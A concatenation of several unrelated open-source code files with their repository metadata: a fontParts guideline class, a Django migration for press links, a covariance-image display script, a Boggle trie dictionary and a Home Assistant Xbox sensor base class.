if value is None:
return 0
value = normalizers.normalizeX(value)
return value
def _set_base_x(self, value):
if value is None:
value = 0
else:
value = normalizers.normalizeX(value)
self._set_x(value)
def _get_x(self):
"""
This is the environment implementation of
:attr:`BaseGuideline.x`. This must return an
:ref:`type-int-float`.
Subclasses must override this method.
"""
self.raiseNotImplementedError()
def _set_x(self, value):
"""
This is the environment implementation of
:attr:`BaseGuideline.x`. **value** will be
an :ref:`type-int-float`.
Subclasses must override this method.
"""
self.raiseNotImplementedError()
# y
y = dynamicProperty(
"base_y",
"""
The y coordinate of the guideline.
It must be an :ref:`type-int-float`. ::
>>> guideline.y
100
>>> guideline.y = 101
"""
)
def _get_base_y(self):
value = self._get_y()
if value is None:
return 0
value = normalizers.normalizeY(value)
return value
def _set_base_y(self, value):
if value is None:
value = 0
else:
value = normalizers.normalizeY(value)
self._set_y(value)
def _get_y(self):
"""
This is the environment implementation of
:attr:`BaseGuideline.y`. This must return an
:ref:`type-int-float`.
Subclasses must override this method.
"""
self.raiseNotImplementedError()
def _set_y(self, value):
"""
This is the environment implementation of
:attr:`BaseGuideline.y`. **value** will be
an :ref:`type-int-float`.
Subclasses must override this method.
"""
self.raiseNotImplementedError()
# angle
angle = dynamicProperty(
"base_angle",
"""
The angle of the guideline.
It must be an :ref:`type-angle`.
Please check how :func:`normalizers.normalizeRotationAngle`
handles the angle. There is a special case when the angle is ``None``:
if both x and y are non-zero, the angle will be 0; if x is 0 but y
is not, the angle will be 0; if y is 0 and x is not, the
angle will be 90; if both x and y are 0, the angle will be 0.
::
>>> guideline.angle
45.0
>>> guideline.angle = 90
"""
)
def _get_base_angle(self):
value = self._get_angle()
if value is None:
if self._get_x() != 0 and self._get_y() != 0:
value = 0
elif self._get_x() != 0 and self._get_y() == 0:
value = 90
elif self._get_x() == 0 and self._get_y() != 0:
value = 0
else:
value = 0
value = normalizers.normalizeRotationAngle(value)
return value
def _set_base_angle(self, value):
if value is None:
if self._get_x() != 0 and self._get_y() != 0:
value = 0
elif self._get_x() != 0 and self._get_y() == 0:
value = 90
elif self._get_x() == 0 and self._get_y() != 0:
value = 0
else:
value = 0
value = normalizers.normalizeRotationAngle(value)
self._set_angle(value)
def _get_angle(self):
"""
This is the environment implementation of
:attr:`BaseGuideline.angle`. This must return an
:ref:`type-angle`.
Subclasses must override this method.
"""
self.raiseNotImplementedError()
def _set_angle(self, value):
"""
This is the environment implementation of
:attr:`BaseGuideline.angle`. **value** will be
an :ref:`type-angle`.
Subclasses must override this method.
"""
self.raiseNotImplementedError()
# --------------
# Identification
# --------------
# index
index = dynamicProperty(
"base_index",
"""
The index of the guideline within the ordered
list of the parent glyph's guidelines. This
attribute is read only. ::
>>> guideline.index
0
"""
)
def _get_base_index(self):
value = self._get_index()
value = normalizers.normalizeIndex(value)
return value
def _get_index(self):
"""
Get the guideline's index.
This must return an ``int``.
Subclasses may override this method.
"""
glyph = self.glyph
if glyph is not None:
parent = glyph
else:
parent = self.font
if parent is None:
return None
return parent.guidelines.index(self)
# name
name = dynamicProperty(
"base_name",
"""
The name of the guideline. This will be a
:ref:`type-string` or ``None``.
>>> guideline.name
'my guideline'
>>> guideline.name = None
"""
)
def _get_base_name(self):
value = self._get_name()
if value is not None:
value = normalizers.normalizeGuidelineName(value)
return value
def _set_base_name(self, value):
if value is not None:
value = normalizers.normalizeGuidelineName(value)
self._set_name(value)
def _get_name(self):
"""
This is the environment implementation of
:attr:`BaseGuideline.name`. This must return a
:ref:`type-string` or ``None``. The returned
value will be normalized with
:func:`normalizers.normalizeGuidelineName`.
Subclasses must override this method.
"""
self.raiseNotImplementedError()
def _set_name(self, value):
"""
This is the environment implementation of
:attr:`BaseGuideline.name`. **value** will be
a :ref:`type-string` or ``None``. It will
have been normalized with
:func:`normalizers.normalizeGuidelineName`.
Subclasses must override this method.
"""
self.raiseNotImplementedError()
# color
color = dynamicProperty(
"base_color",
""""
The guideline's color. This will be a
:ref:`type-color` or ``None``. ::
>>> guideline.color
None
>>> guideline.color = (1, 0, 0, 0.5)
"""
)
def _get_base_color(self):
value = self._get_color()
if value is not None:
value = normalizers.normalizeColor(value)
value = Color(value)
return value
def _set_base_color(self, value):
if value is not None:
value = normalizers.normalizeColor(value)
self._set_color(value)
def _get_color(self):
"""
This is the environment implementation of
:attr:`BaseGuideline.color`. This must return
a :ref:`type-color` or ``None``. The
returned value will be normalized with
:func:`normalizers.normalizeColor`.
Subclasses must override this method.
"""
self.raiseNotImplementedError()
def _set_color(self, value):
"""
This is the environment implementation of
:attr:`BaseGuideline.color`. **value** will
be a :ref:`type-color` or ``None``.
It will have been normalized with
:func:`normalizers.normalizeColor`.
Subclasses must override this method.
"""
self.raiseNotImplementedError()
# --------------
# Transformation
# --------------
def _transformBy(self, matrix, **kwargs):
"""
This is the environment implementation of
:meth:`BaseGuideline.transformBy`.
**matrix** will be a :ref:`type-transformation`.
that has been normalized with :func:`normalizers.normalizeTransformationMatrix`.
Subclasses may override this method.
"""
t = transform.Transform(*matrix)
# coordinates
x, y = t.transformPoint((self.x, self.y))
self.x = x
self.y = y
# angle
angle = math.radians(-self.angle)
dx = math.cos(angle)
dy = math.sin(angle)
tdx, tdy = t.transformPoint((dx, dy))
ta = math.atan2(tdy - t[5], tdx - t[4])
self.angle = -math.degrees(ta)
# -------------
# Interpolation
# -------------
compatibilityReporterClass = GuidelineCompatibilityReporter
def isCompatible(self, other):
"""
Evaluate interpolation compatibility with **other**. ::
>>> compatible, report = self.isCompatible(otherGuideline)
>>> compatible
True
>>> report
[Warning] Guideline: "xheight" + "cap_height"
[Warning] Guideline: "xheight" has name xheight | "cap_height" has
name cap_height
This will return a ``bool`` indicating if the guideline is
compatible for interpolation with **other** and a
:ref:`type-string` of compatibility notes.
"""
return super(BaseGuideline, self).isCompatible(other, BaseGuideline)
def _isCompatible(self, other, reporter):
"""
This is the environment implementation of
:meth:`BaseGuideline.isCompatible`.
Subclasses may override this method.
"""
guideline1 = self
guideline2 = other
# guideline names
if guideline1.name != guideline2.name:
reporter.nameDifference = True
reporter.warning = True
# -------------
# Normalization
# -------------
def round(self):
"""
Round the guideline's coordinate.
>>> guideline.round()
This applies to the following:
* x
* y
It does not apply to
* angle
"""
self._round()
def _round(self, **kwargs):
"""
This is the environment implementation of
:meth:`BaseGuideline.round`.
Subclasses may override this method.
"""
self.x = normalizers.normalizeRounding(self.x)
self.y = normalizers.normalizeRounding(self.y)
| {
"content_hash": "f659cb8055825b646b03438682365b9f",
"timestamp": "",
"source": "github",
"line_count": 508,
"max_line_length": 88,
"avg_line_length": 26.80708661417323,
"alnum_prop": 0.5424438243501248,
"repo_name": "robofab-developers/fontParts",
"id": "3014a48329f990fd4242fb34a30aaca848db768f",
"size": "13618",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "Lib/fontParts/base/guideline.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "913380"
},
{
"name": "Shell",
"bytes": "1837"
}
],
"symlink_target": ""
} |
from __future__ import unicode_literals
from django.db import models, migrations
import datetime
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
('sites', '0001_initial'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Entry',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('title', models.CharField(max_length=255, verbose_name='title')),
('slug', models.SlugField(max_length=255, verbose_name=b'slug', unique_for_date=b'pub_date')),
('pub_date', models.DateTimeField(default=datetime.datetime.now, verbose_name='publication date')),
('status', models.IntegerField(default=2, verbose_name='status', choices=[(1, 'Live'), (2, 'Draft'), (3, 'Hidden')])),
('excerpt', models.TextField(verbose_name='Excerpt', blank=True)),
('source', models.CharField(max_length=255, verbose_name='the source for the entry', blank=True)),
('author', models.ForeignKey(related_name='press_links_entry_related', verbose_name='author', to=settings.AUTH_USER_MODEL)),
('site', models.ManyToManyField(related_name='press_links_entry_related', verbose_name='Sites where the entry is published', to='sites.Site')),
],
options={
'ordering': ['-pub_date'],
'get_latest_by': 'pub_date',
'verbose_name': 'Press Entry',
'verbose_name_plural': 'Press Entries',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Link',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('link', models.CharField(max_length=255, verbose_name='link address (add http:// for external link)')),
('link_text', models.CharField(max_length=255, verbose_name='text for link')),
('link_new_page', models.BooleanField(default=False, verbose_name='open link in new page')),
('entry', models.ForeignKey(verbose_name='Entry', to='press_links.Entry')),
],
options={
'verbose_name': 'Press Link',
'verbose_name_plural': 'Press Links',
},
bases=(models.Model,),
),
]
| {
"content_hash": "5398a9cfbbf6176f13d1a310a40e7dd1",
"timestamp": "",
"source": "github",
"line_count": 52,
"max_line_length": 159,
"avg_line_length": 49.28846153846154,
"alnum_prop": 0.573546625048771,
"repo_name": "mvpoland/django-press-links",
"id": "fac3ae48b60cf89e00f3bdafbf4bb4732b8a98f8",
"size": "2587",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "press_links/migrations/0001_initial.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "HTML",
"bytes": "4145"
},
{
"name": "Python",
"bytes": "27063"
}
],
"symlink_target": ""
} |
import argparse, sys
import numpy as np
from matplotlib import pyplot as plt
import scipy.sparse.linalg as LA
# Parse command line
parser = argparse.ArgumentParser(description='Display the result of the covariance example.')
parser.add_argument('input', help="path to covariance result (mean image or covariance image)")
args = parser.parse_args()
# Get input file
fname = args.input
print "Input file:", fname
# Set patch size
psize = 64
f = open(fname,"rb")
try:
header = np.fromfile(f, dtype=np.dtype('>i4'), count=3)
type = header[0]
rows = header[1]
cols = header[2]
print "opencv type: ", type
print "rows: ", rows, " cols: ", cols
mat = np.fromfile(f, dtype=np.dtype('>f'))
if (cols==psize):
print "Displaying Mean Image." # just display
imgplt = plt.imshow(np.reshape(mat, (-1,psize)))
imgplt.set_cmap('gray')
imgplt.set_clim(0.0,1.0)
plt.title('Average Patch')
plt.colorbar()
plt.show()
else:
print "Displaying Covariance Image." # compute eigenvectors and display first 15 in 5x3 grid
w, v = LA.eigs(np.reshape(mat, (cols,rows)), k=15)
img = np.zeros((psize*3,psize*5))
for j in range(0,3):
for i in range(0,5):
for y in range(0,psize):
for x in range(0,psize):
img[(j*psize+y),(i*psize+x)] = v[:,j*5+i].reshape(psize,psize)[y,x]
imgplt = plt.imshow(np.real(img))
imgplt.set_cmap('gray')
imgplt.set_clim(-0.1,0.1) # Guess range
plt.title('Principal Components of Covariance Matrix')
plt.colorbar()
plt.show()
finally:
f.close()
| {
"content_hash": "b626d46abdd1e7a864b17d246d5d8dcb",
"timestamp": "",
"source": "github",
"line_count": 58,
"max_line_length": 100,
"avg_line_length": 29.603448275862068,
"alnum_prop": 0.5934769947582994,
"repo_name": "hrushikesh-dhumal/hipi",
"id": "a8e23ab14ed5804d0be38e2b5818005979d054c6",
"size": "1736",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "util/showCovarianceOutput.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "5665"
},
{
"name": "HTML",
"bytes": "152766"
},
{
"name": "Java",
"bytes": "238812"
},
{
"name": "Matlab",
"bytes": "821"
},
{
"name": "Python",
"bytes": "1736"
},
{
"name": "Shell",
"bytes": "1127"
}
],
"symlink_target": ""
} |
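To try the viewer above without running the full covariance job, one can write a synthetic "mean image" file in the layout the script parses (three big-endian int32 header values for type, rows and cols, followed by big-endian float32 pixel data) and point the script at it. The file name below is made up for illustration, and the OpenCV type value is only printed by the script, never interpreted.

# Write a synthetic 64x64 mean-image file matching the header/data layout read by showCovarianceOutput.py.
import numpy as np

psize = 64
header = np.array([5, psize, psize], dtype='>i4')  # opencv type, rows, cols (big-endian int32)
data = np.random.rand(psize, psize).astype('>f')   # big-endian float32 values in [0, 1)
with open('mean_patch.bin', 'wb') as f:
    header.tofile(f)
    data.tofile(f)
# Then: python showCovarianceOutput.py mean_patch.bin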
"""Stores the dictionary in a linked list."""
from bogglesolver.twl06 import WORD_LIST
from bogglesolver.twl06 import TEST_WORD_LIST
class _dictnode:
"""
An element of the dictionary.
Each element represents one letter in a word.
Each element contains an array of potential next elements.
This means that look-up time for a word depends only on the
length of the word.
It also means that if you have a partial word,
all potential endings are further down the tree.
"""
def __init__(self):
self.letters = {}
self.word = ""
def add_letter(self, word, index, word_len):
"""
Add a word letter by letter to the tree.
:param str word: word that should be added.
:param str index: current index for the letter to add.
"""
if word_len > index:
if word[index] in self.letters.keys():
self.letters[word[index]].add_letter(word, index + 1, word_len)
else:
self.letters[word[index]] = _dictnode()
self.letters[word[index]].add_letter(word, index + 1, word_len)
else:
self.word = word
class Edict:
"""
The interface for the dictionary.
Contains the root element of the dictionary.
Contains helpful functions for creating, adding to,
and accessing the dictionary elements.
"""
def __init__(self):
self.dictionary_root = _dictnode()
def read_dictionary(self, use_test_words=False):
"""
Read in the list of valid words and add them to the dictionary.
:param bool use_test_words: whether to use
the test words or actual words.
"""
words = None
if use_test_words:
words = TEST_WORD_LIST
else:
words = WORD_LIST
for word in reversed(words):
self.add_word(word.lower())
def is_word(self, word):
"""
Determine if a word is in the dictionary.
        Lookup in the dictionary is O(n), where n is the length of the word.
:param str word: word to look for in the dictionary.
:returns: True if word is in dictionary. Otherwise False.
"""
node = self.get_last_node(self.dictionary_root, word.lower())
return node.word != "" if node else False
def add_word(self, word):
"""
Add a word to the dictionary.
This is for extending the dictionary.
:param str word: word to add.
"""
self.dictionary_root.add_letter(word.lower(), 0, len(word))
def get_words(self, node, all_words=[]): # pylint: disable=W0102
"""
Get all words from the specified node on down.
If called with the root node passed in,
returns all words in the dictionary.
:param _dictnode node: node to get all words from.
:param list all_words: list of all words found so far.
:returns: all words from the node on down.
"""
for a_node in node.letters.keys():
all_words = self.get_words(node.letters[a_node], all_words)
if node.word and node.word not in all_words:
all_words.append(node.word)
return all_words
@staticmethod
def get_last_node(node, letter):
"""
        Follow the given letters from the provided node.
        :param _dictnode node: node in the Edict to start from.
        :param str letter: letters to follow from the node.
        :returns: the node reached after the last letter, or None if the path does not exist.
"""
for l in letter:
if l not in node.letters.keys():
return None
node = node.letters[l]
return node
| {
"content_hash": "804f497dd323e7d788e819266169772d",
"timestamp": "",
"source": "github",
"line_count": 122,
"max_line_length": 83,
"avg_line_length": 30.418032786885245,
"alnum_prop": 0.5914847749932632,
"repo_name": "theovoss/BoggleSolver",
"id": "78e54f079c58d43bb71256ff8cd37106facee2df",
"size": "3734",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "bogglesolver/load_english_dictionary.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "8827"
},
{
"name": "Python",
"bytes": "2335059"
}
],
"symlink_target": ""
} |
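A minimal usage sketch of the Edict interface above, using only methods defined in the module; the example words are arbitrary.

# Usage sketch for Edict (arbitrary example words).
from bogglesolver.load_english_dictionary import Edict

d = Edict()
for w in ('cat', 'cats', 'dog'):
    d.add_word(w)

print(d.is_word('cat'))   # True - 'cat' was added as a word
print(d.is_word('ca'))    # False - 'ca' is only a prefix, not a stored word
print(sorted(d.get_words(d.dictionary_root, [])))  # ['cat', 'cats', 'dog']

# Prefix walking: get_last_node returns the node reached by a prefix (or None),
# and every completion of that prefix lives in the subtree below it.
node = Edict.get_last_node(d.dictionary_root, 'ca')
if node:
    print(sorted(d.get_words(node, [])))  # ['cat', 'cats']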
"""Base Sensor for the Xbox Integration."""
from __future__ import annotations
from yarl import URL
from homeassistant.helpers.device_registry import DeviceEntryType
from homeassistant.helpers.entity import DeviceInfo
from homeassistant.helpers.update_coordinator import CoordinatorEntity
from . import PresenceData, XboxUpdateCoordinator
from .const import DOMAIN
class XboxBaseSensorEntity(CoordinatorEntity[XboxUpdateCoordinator]):
"""Base Sensor for the Xbox Integration."""
def __init__(
self, coordinator: XboxUpdateCoordinator, xuid: str, attribute: str
) -> None:
"""Initialize Xbox binary sensor."""
super().__init__(coordinator)
self.xuid = xuid
self.attribute = attribute
@property
def unique_id(self) -> str:
"""Return a unique, Home Assistant friendly identifier for this entity."""
return f"{self.xuid}_{self.attribute}"
@property
def data(self) -> PresenceData | None:
"""Return coordinator data for this console."""
return self.coordinator.data.presence.get(self.xuid)
@property
def name(self) -> str | None:
"""Return the name of the sensor."""
if not self.data:
return None
if self.attribute == "online":
return self.data.gamertag
attr_name = " ".join([part.title() for part in self.attribute.split("_")])
return f"{self.data.gamertag} {attr_name}"
@property
def entity_picture(self) -> str | None:
"""Return the gamer pic."""
if not self.data:
return None
        # Xbox sometimes returns a domain that serves the wrong certificate, which
        # breaks loading of the image.
        # The correct domain is images-eds-ssl, which can simply be swapped in
        # to fetch the same image with a valid certificate.
        # The 'mode=Padding' query parameter must also be removed because it triggers an HTTP 400 error.
url = URL(self.data.display_pic)
if url.host == "images-eds.xboxlive.com":
url = url.with_host("images-eds-ssl.xboxlive.com").with_scheme("https")
query = dict(url.query)
query.pop("mode", None)
return str(url.with_query(query))
@property
def entity_registry_enabled_default(self) -> bool:
"""Return if the entity should be enabled when first added to the entity registry."""
return self.attribute == "online"
@property
def device_info(self) -> DeviceInfo:
"""Return a device description for device registry."""
return DeviceInfo(
entry_type=DeviceEntryType.SERVICE,
identifiers={(DOMAIN, "xbox_live")},
manufacturer="Microsoft",
model="Xbox Live",
name="Xbox Live",
)
| {
"content_hash": "e2eb8ff8c3064605dde0c69ad41b5d4a",
"timestamp": "",
"source": "github",
"line_count": 79,
"max_line_length": 102,
"avg_line_length": 35.70886075949367,
"alnum_prop": 0.640907479617157,
"repo_name": "mezz64/home-assistant",
"id": "5d0f3f92434e9e743ac33da2018655ef47aa01db",
"size": "2821",
"binary": false,
"copies": "3",
"ref": "refs/heads/dev",
"path": "homeassistant/components/xbox/base_sensor.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "2963"
},
{
"name": "PLSQL",
"bytes": "840"
},
{
"name": "Python",
"bytes": "52481895"
},
{
"name": "Shell",
"bytes": "6252"
}
],
"symlink_target": ""
} |
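For context, a concrete entity would typically combine this base class with a Home Assistant platform mixin and read the configured attribute from self.data. The subclass below is purely illustrative, not the integration's actual sensor class, and assumes the tracked attribute is a boolean field of PresenceData.

# Illustrative sketch only: a binary sensor built on XboxBaseSensorEntity.
from homeassistant.components.binary_sensor import BinarySensorEntity

class XboxPresenceBinarySensor(XboxBaseSensorEntity, BinarySensorEntity):
    """Expose one boolean field of PresenceData as a binary sensor."""

    @property
    def is_on(self) -> bool:
        """Return True when the tracked presence attribute is truthy."""
        if not self.data:
            return False
        return bool(getattr(self.data, self.attribute, False))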